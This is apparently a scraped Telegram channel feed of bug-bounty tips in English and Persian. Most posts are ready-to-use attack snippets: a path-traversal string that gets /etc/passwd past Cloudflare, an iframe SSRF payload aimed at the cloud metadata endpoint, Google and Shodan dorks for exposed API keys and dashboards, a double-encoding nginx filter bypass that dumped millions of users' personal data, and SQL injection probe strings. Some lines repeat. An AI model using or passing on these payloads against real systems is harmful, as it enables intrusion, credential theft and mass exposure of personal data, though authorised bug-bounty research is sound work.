Dagen (security)
https://www.youtube.com/watch?v=d6RzGhpV1Vg&t=592s
how create Automation with n8n🤌
nice flow
nice flow
Dagen (security)
shodan Dork: org:<name> http.noscript:"cAdvisor"
این Dork میتواند در مواردی یک داشبورد در حال اجرا با پورت تصادفی به شما نمایش دهد 🤌
❤1
Cloudflare bypass (/etc/passwd)
../../etc/passwd —> 403 Forbidden../../etc/random/.../passwd —> 200 OK👍3
Dagen (security)
https://freedium.cfd/25-000-ssrf-in-hackerones-analytics-reports-b9a5b3aa3d6e
easy ssrf in hackerone😎
just inject this payload in pdf file rendering :
just inject this payload in pdf file rendering :
<iframe src="http://169.254.169.254/latest/meta-data/"></iframe>
Dagen (security)
https://freedium.cfd/https://medium.com/legionhunters/subdomain-dork-recon-via-3rd-party-54ea05b59a62
اگه به ریکان سابدامین با گوگل دورک علاقه دارید، این مقاله رو از دست ندید! 👀
نویسنده با معرفی چند منبع کمتر شناختهشده، راههای خلاقانهای برای پیدا کردن سابدامینهای تارگت بهتون یاد میده .
نویسنده با معرفی چند منبع کمتر شناختهشده، راههای خلاقانهای برای پیدا کردن سابدامینهای تارگت بهتون یاد میده .
👍1
Dagen (security)
https://osintteam.blog/13-950-bounty-stored-xss-in-gitlab-notes-with-a-clever-csp-bypass-via-base-9ca1f49994e3
Gitlab Stored xss with <base> Tag + CSP bypass 🤌🔥
easy 50$ with this google dork :🗿
api key test and worked:)
site:target.org intext:"test_" + intext:"api key"
api key test and worked:)
❤3🌚2
4.5M users' PII dumped + 20k bounty 🤯
/get_all_users —> 403 Forbidden
/get_all_userz —> 404 Not Found
final path:
all user data dump :)
source :
/get_all_users —> 403 Forbidden
/get_all_userz —> 404 Not Found
just double-encode "S" bypass nginx filter
final path:
/get_all_user%2573
all user data dump :)
source :
https://www.youtube.com/watch?v=PXqlHAoF2wc❤4👍1
Easily Detect SQL Injection Points 🛡
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd''
❤7👍1